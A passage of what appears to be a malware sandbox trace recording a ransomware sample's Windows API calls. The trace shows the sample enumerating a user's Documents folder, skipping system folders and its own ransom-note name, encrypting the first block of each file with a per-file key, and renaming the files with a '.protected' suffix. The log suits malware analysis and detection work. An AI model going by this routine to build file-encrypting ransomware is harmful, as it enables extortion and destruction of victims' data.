cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx.protected") returned 79 [0091.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7sc7dpjcftod6uzuvwut.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7sc7dpjcftod6uzuvwut.pptx.protected")) returned 1 [0091.324] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="Windows") returned -1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="Program Files") returned -1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="Program Files (x86)") returned -1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="$Recycle.bin") returned 1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="System Volume Information") returned -1 [0091.324] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.324] StrStrIW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".protected") returned 0x0 [0091.324] lstrcmpW (lpString1="8EyVjmEGj8d.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.324] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.324] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8eyvjmegj8d.xlsx"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.325] StrStrW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".txt") returned 0x0 [0091.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.325] StrStrW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".rar") returned 0x0 [0091.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.325] StrStrW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".zip") returned 0x0 [0091.325] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.325] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.325] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.325] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.326] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.326] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.326] CloseHandle 
(hObject=0xb4) returned 1 [0091.326] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx.protected") returned 70 [0091.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8eyvjmegj8d.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8eyvjmegj8d.xlsx.protected")) returned 1 [0091.326] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="Windows") returned -1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="Program Files") returned -1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="Program Files (x86)") returned -1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="$Recycle.bin") returned 1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="System Volume Information") returned -1 [0091.327] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrIW (lpFirst="9Fwpsj.ods", lpSrch=".protected") returned 0x0 [0091.327] lstrcmpW (lpString1="9Fwpsj.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.327] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.327] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9fwpsj.ods"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrW (lpFirst="9Fwpsj.ods", lpSrch=".txt") returned 0x0 [0091.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrW (lpFirst="9Fwpsj.ods", lpSrch=".rar") returned 0x0 [0091.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrW (lpFirst="9Fwpsj.ods", lpSrch=".zip") returned 0x0 [0091.327] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.328] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.328] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.328] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.328] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.328] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.328] CloseHandle (hObject=0xb4) returned 1 [0091.328] wnsprintfW (in: pszDest=0x4695e0, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods.protected") returned 64 [0091.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9fwpsj.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9fwpsj.ods.protected")) returned 1 [0091.336] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="Windows") returned -1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="Program Files") returned -1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="Program Files (x86)") returned -1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="$Recycle.bin") returned 1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="System Volume Information") returned -1 [0091.336] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.336] StrStrIW (lpFirst="CZj6.csv", lpSrch=".protected") returned 0x0 [0091.336] lstrcmpW (lpString1="CZj6.csv", lpString2="RESTORE_FILES.txt") returned -1 [0091.336] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.336] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\czj6.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0xb4 [0091.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.337] StrStrW (lpFirst="CZj6.csv", lpSrch=".txt") returned 0x0 [0091.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.337] StrStrW (lpFirst="CZj6.csv", lpSrch=".rar") returned 0x0 [0091.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.337] StrStrW (lpFirst="CZj6.csv", lpSrch=".zip") returned 0x0 [0091.337] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.337] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.337] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.338] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.338] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.338] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.338] CloseHandle (hObject=0xb4) returned 1 [0091.338] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv.protected") returned 62 
[0091.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\czj6.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\czj6.csv.protected")) returned 1 [0091.339] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.339] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.339] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 
55 [0091.339] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.339] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.340] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.340] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.340] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.340] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.340] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.340] CloseHandle (hObject=0xb4) returned 1 [0091.340] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.protected") returned 65 [0091.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.protected")) returned 1 [0091.341] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="Windows") returned -1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="Program Files") returned -1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="Program Files (x86)") returned -1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="$Recycle.bin") returned 1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="System Volume Information") returned -1 [0091.341] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.341] StrStrIW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".protected") returned 0x0 [0091.341] lstrcmpW (lpString1="dJ XneLh8Fg_.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.341] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.341] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dj xnelh8fg_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") 
returned 61 [0091.342] StrStrW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".txt") returned 0x0 [0091.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.342] StrStrW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".rar") returned 0x0 [0091.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.342] StrStrW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".zip") returned 0x0 [0091.342] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.343] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.343] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.343] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.343] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.343] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.343] CloseHandle (hObject=0xb4) returned 1 [0091.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx.protected") returned 71 [0091.343] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dj xnelh8fg_.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dj xnelh8fg_.pptx.protected")) returned 1 [0091.344] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="Windows") returned -1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="Program Files") returned -1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="Program Files (x86)") returned -1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="$Recycle.bin") returned 1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="System Volume Information") returned -1 [0091.344] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrIW (lpFirst="Eze0cP.docx", lpSrch=".protected") returned 0x0 [0091.344] lstrcmpW (lpString1="Eze0cP.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eze0cp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrW (lpFirst="Eze0cP.docx", lpSrch=".txt") returned 0x0 [0091.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrW (lpFirst="Eze0cP.docx", lpSrch=".rar") returned 0x0 [0091.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrW (lpFirst="Eze0cP.docx", lpSrch=".zip") returned 0x0 [0091.344] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.345] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.345] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.345] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.345] CloseHandle (hObject=0xb4) returned 1 [0091.345] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx.protected") returned 65 [0091.346] MoveFileW 
